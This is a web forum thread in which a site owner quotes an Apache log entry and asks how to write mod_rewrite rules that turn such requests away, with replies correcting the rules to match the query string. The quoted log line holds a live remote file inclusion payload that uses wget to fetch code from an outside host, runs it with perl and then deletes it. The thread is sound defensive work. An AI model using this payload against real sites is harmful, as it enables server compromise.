Forum Moderators: phranque
000.172.186.40 - - [13/Feb/2006:18:51:19 -0500] "GET /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mo
sConfig_absolute_path=http://www.microsofti.li/tool.gif?&cmd=cd%20/tmp/;wget%20http://www.microsofti.li/sess3024_;perl%20se
ss3024_;rm%20-rf%20sess3024*? HTTP/1.0" 200 16 "-" "Mozilla/5.0"They currently get mod_rewrite(d) to index.php but I'd like to just redirect them off to a non-existant url so they just get 404's ... The URL after the string "absolute_path" varies a bit so I'm trying this... with not much luck.
RewriteCond %{REQUEST_URI} ^absolute_path$ [OR]
RewriteCond %{THE_REQUEST} ^absolute_path$
RewriteRule /* http://nnn.yyyyyyyy.zzz [R,L]
Why isn't this working?
RewriteCond %{REQUEST_URI} ^absolute_path$for example, you are saying:
If the REQUEST_URI begins with absolute_path and goes no further ...
You may want something more broad like:
RewriteCond %{REQUEST_URI} ^.*absolute_path.*$which says:
If the REQUEST_URI contains absolute_path ...
RewriteCond %{REQUEST_URI} absolute_path
Actually, that won't work either, because query strings are not part of a URI, but rather data attached to a URI to be passed to the resource *at* that URI.
Instead, you'll need:
RewriteCond %{QUERY_STRING} absolute_path
And for the simplest solution:
RewriteCond %{QUERY_STRING} absolute_path1 [OR]
RewriteCond %{QUERY_STRING} absolute_path2
RewriteCond %{REQUEST_URI} !^/path_to_custom_403_error_page\.html$
RewriteRule .* - [F]
Jim
